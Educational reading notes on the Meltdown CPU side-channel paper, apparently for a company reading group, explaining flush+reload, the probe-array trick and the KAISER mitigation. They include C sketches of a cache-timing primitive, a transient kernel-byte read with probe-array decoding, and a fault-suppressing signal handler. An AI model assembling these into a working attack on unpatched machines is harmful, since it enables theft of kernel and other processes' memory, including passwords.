Reading: Meltdown

3 Takeaways

  • Through a side-channel attack, Meltdown takes advantage of a performance feature of modern CPUs called out-of-order execution to gain access to memory reserved for the kernel, as well as memory used by other processes. Memory used by the kernel and other processes should not be accessible to the application.
  • Because the exploit depends on a feature of modern CPUs that turns out to be a vulnerability due to side-channels, it affects all operating systems running on those CPUs. The paper shows that on an operating system like Linux or OS X, the entire physical memory can be read. This includes reading the memory of sandboxed processes that should be protected by things like containers/virtualization.
  • Luckily, and unlike the related Spectre attack, Meltdown can largely be avoided through a countermeasure called KAISER that was developed a year earlier for the Linux kernel. At this point, the major operating systems all have similar patches available to protect against Meltdown, albeit by incurring a performance penalty.

Questions I have going in

  • What is the difference between out-of-order execution (apparently what Meltdown exploits) and speculative execution (apparently what Spectre exploits)?

Overall notes

  • Section 2 is a great recap of (or introduction to) computer architecture/organization classes. Each program has access to virtual memory addresses, which are mapped to physical memory by way of translation tables that are swapped out at each context (program) switch. The kernel's memory (kernel space) is also mapped into each virtual address space to make process <-> kernel communication more efficient. In practice, on Linux and OS X the entire physical memory is accessible through the kernel's memory, though with KASLR its location is randomized on each reboot. Programs normally can't access kernel space without permission, but through some cache/side-channel tricks they can surmise what's in kernel space, and by extension what's in the rest of physical memory.
  • The way the process is able to determine the contents of a page it can't access is via a flush+reload attack, which is written about in a different paper. A screenshot from that paper helps explain how it works. Basically, your program says "get rid of this memory location" and then tries to access the location again after some time; if it takes only a short amount of time to pull the data up again, then it's likely been read (into a shared cache) by some other program in the meantime (see the flush+reload figure; a minimal timing sketch in C appears after this list).
  • To show how a read based on some data you're not allowed to access is possible with flush+reload, the authors provide a toy example, which I've annotated. Assuming `data` is a byte (256 possible values), and given that memory pages are 4 KB, I can create an array of size 1 MB (256 * 4096). After reading array element `data * 4096`, I can flush+reload each page to determine which page was read, which corresponds to the value of `data` (see the annotated toy-example figure; a C sketch of this encode/decode pattern appears after this list).
  • But how can you hit an exception and not crash your program? The authors offer three approaches:
    1. fork your program and let your child run the exceptional code (crashing) as well as the out-of-order read. Then run flush+reload to see what your child read.
    2. create a signal-based exception handler that tells the program to ignore the crash/segmentation fault (a minimal sketch appears after this list).
    3. suppress the exception through transactional memory, or some tricks that the Spectre attack utilizes that I didn't understand.
  • Section 5 explains the 5-line assembly inner loop. I've annotated the assembly to understand it better. Essentially, outside of this assembly, you're looping over every byte of kernel memory. For each byte, you run the code from the annotated screenshot, trying to access a mapped part of your probe array. After each byte, you run flush+reload to determine what the value at that kernel memory byte was. Sounds tiring, except it's done by a computer :) (see the annotated assembly figure; the C sketch after this list mirrors the same flow).
  • You might think reading a byte at a time is slow. In fact, in Section 5.2, they explain that because flush+reload across 256 pages is the slow part, they read a bit at a time and just determine if it was a 0 or a 1 rather than flush+reloading a large probe array.
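
To make the flush+reload mechanics from the notes above concrete, here is a minimal timing sketch in C for x86-64 using GCC/Clang intrinsics. It is not code from the paper; the names and the lack of a calibrated threshold are my own simplifications, and a real attack needs calibration and noise handling.

```c
/* Minimal flush+reload timing sketch (x86-64, GCC/Clang). Not from the paper. */
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

/* Flush one cache line so that a later fast reload implies someone
 * (or some transient instruction) touched it in the meantime. */
static void flush(const void *addr) {
    _mm_clflush(addr);
}

/* Time a single load of addr; a low cycle count means it was cached. */
static uint64_t reload_time(const void *addr) {
    unsigned int aux;
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    (void)*(volatile const uint8_t *)addr;   /* the measured load */
    uint64_t end = __rdtscp(&aux);
    _mm_mfence();
    return end - start;
}

int main(void) {
    static uint8_t page[4096];
    page[0] = 1;                                   /* bring it into the cache */
    printf("warm reload: %llu cycles\n", (unsigned long long)reload_time(page));
    flush(page);
    printf("cold reload: %llu cycles\n", (unsigned long long)reload_time(page));
    return 0;
}
```

On typical hardware the warm reload is noticeably faster than the cold one; that timing gap is the entire signal the attack measures.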
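
The toy example and the Section 5 inner loop boil down to the same encode/decode pattern, sketched conceptually in C below. This is not the paper's hand-tuned assembly, and on its own it will simply crash at the illegal read (which is what the exception-handling approaches above deal with); it only illustrates how a secret byte selects which probe page ends up cached.

```c
/* Conceptual C version of the toy example / Section 5 inner loop.
 * Illustrative only: the kernel dereference below faults architecturally,
 * and whether the probe access happens transiently is up to the CPU. */
#include <stdint.h>
#include <x86intrin.h>

#define PAGE_SIZE 4096
static uint8_t probe_array[256 * PAGE_SIZE];    /* 1 MB: one page per byte value */

/* Same primitives as the previous sketch, repeated so this compiles alone. */
static void flush(const void *addr) { _mm_clflush(addr); }
static uint64_t reload_time(const void *addr) {
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);
    (void)*(volatile const uint8_t *)addr;
    return __rdtscp(&aux) - start;
}

/* Architecturally this raises SIGSEGV, but an out-of-order load of the secret
 * byte may already have touched probe_array[secret * PAGE_SIZE]. */
static void transient_read(const uint8_t *kernel_addr) {
    uint8_t secret = *kernel_addr;                  /* illegal read: faults */
    (void)probe_array[secret * PAGE_SIZE];          /* encodes secret into the cache */
}

/* Afterwards, flush+reload all 256 pages: the one "fast" page is the byte. */
static int recover_byte(uint64_t threshold) {
    for (int value = 0; value < 256; value++) {
        if (reload_time(&probe_array[value * PAGE_SIZE]) < threshold)
            return value;
    }
    return -1;   /* nothing was cached: retry this address */
}
```

The `* PAGE_SIZE` indexing is the C equivalent of the `shl rax, 0xc` in the paper's assembly: it spreads the 256 possible byte values across 256 distinct pages so they land in distinct cache lines.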
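
For approach 2 above (catching the fault instead of crashing), here is a minimal, self-contained C sketch using sigaction plus sigsetjmp/siglongjmp. The kernel-space address is purely an illustrative placeholder, not one taken from the paper.

```c
/* Sketch of surviving the SIGSEGV from an illegal read (approach 2 above). */
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>

static sigjmp_buf recovery_point;

/* Instead of letting the fault kill the process, jump back into main. */
static void segv_handler(int sig) {
    (void)sig;
    siglongjmp(recovery_point, 1);
}

int main(void) {
    struct sigaction sa;
    sa.sa_handler = segv_handler;
    sa.sa_flags = 0;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, NULL);

    if (sigsetjmp(recovery_point, 1) == 0) {
        /* Stand-in for the illegal kernel-space read; the address is
         * illustrative and will fault when touched from user mode. */
        volatile uint8_t secret = *(volatile uint8_t *)0xffff888000000000ULL;
        (void)secret;
        printf("no fault (unexpected)\n");
    } else {
        printf("caught SIGSEGV; would now flush+reload the probe array\n");
    }
    return 0;
}
```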

Questions I have coming out

  • Does 503 KB/second mean the exploit is too slow in practice? At 503 KB/second, it would take (1024*1024*1024/(503*1024))/3600 =~ 0.58 hours to read 1 GB of memory, so copying all the memory of a modern server (say, 256 GB) would take roughly six days, which doesn't seem unreasonable for an attacker. You'd probably hit some unencrypted passwords well before then :).
  • Does this exploit work with one process checking its own flush+reload statistics, or are there two applications, one probing and one flushing+reloading?

Questions for B12 to ponder

  • Are we patched :)? I'm pretty sure we are by virtue of AWS upgrading all of the host kernels on our virtualized instances.
  • What's the best way to read papers like these? My process was: 1) Read Adrian's blog post, 2) Read the paper a section at a time, 3) Annotate the figures to make sure I could explain them to myself, 4) Find a useful figure in the flush+reload paper to make sure I understood it.

Other references